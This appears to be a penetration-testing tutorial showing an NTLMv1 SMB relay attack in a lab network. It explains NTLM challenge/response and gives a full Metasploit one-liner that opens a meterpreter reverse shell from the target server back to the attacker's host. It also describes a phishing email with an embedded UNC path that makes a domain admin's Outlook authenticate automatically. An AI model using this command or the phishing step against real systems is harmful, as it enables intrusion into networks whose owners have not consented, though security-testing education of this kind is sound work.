Outlined below is one method of carrying out a NTLMv1 SMB relay attack for the purposes of obtaining a meterpreter shell on our target. For this type of attack to work, we have to insert ourselves into the NTLM challenge/response process. More on that in a minute.
First, we need to understand how NTLM challenge/response works in a basic way. When a client first attempts to connect a network share (for example), the server responds back asking the client who is making the request to encrypt some random data using the user’s password hash. This is the “challenge”. The client encrypts the data as requested and sends it back. This is the response. If the server is successful in decrypting the data and it matches the random data using the password hash which is/was already stored on the server, then the user is considered to be authenticated.
Using Metasploit Framework, we can create a listening SMB service and automate much of the process of inserting ourselves into the middle of the NTLM challenge/response process.
Metasploit box: 172.17.130.81
Domain Admin Workstation: 172.17.130.33
Target Server: 172.17.130.75
Our goal in this scenario is to get a shell on 172.17.130.75.
To do this, we first need to “convince” our victim (172.17.130.33) to make a connection to our Metasploit box (172.17.130.81). To accomplish that piece, we are going to embed a UNC path referencing our Metasploit box in an email message, which will then cause the victim’s computer to carry out the NTLM challenge/response process mentioned above…however, our Metasploit box is going to relay the information to our Target (172.17.130.75) in hopes of getting a shell on the Target box.
To start, we need to fire up Metasploit Framework and load the SMB Relay mode. This can be achieved with the following one-liner:
msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run”
We now need to send an email to our victim with an embedded reference to our Metasploit box which Outlook will (hopefully) automatically load for us. To achieve this (and there may be a better way), I created a file named temp.html and typed up the following HTML code:
After saving it, I re-opened the file using Word (2016). I hit control-a (select all) and pasted the entire contents into an new email message (Outlook 2016), typed up a generic message to the victim, and then hit send. Below is a copy of the message that was opened on the Domain Admin’s workstation within Outlook (2016) on 172.17.130.33.
As soon as the message is opened, the normal NTLM challenge/response process is kicked off; however, in the background, our Metasploit box is relaying the challenege/response to 172.17.130.75. We now have our meterpreter session on 172.17.130.75.
If we look in the Windows Event Logs on 172.17.130.75, we can see the suspicious activity and the payload being delivered and executed.
And finally our meterpreter shell: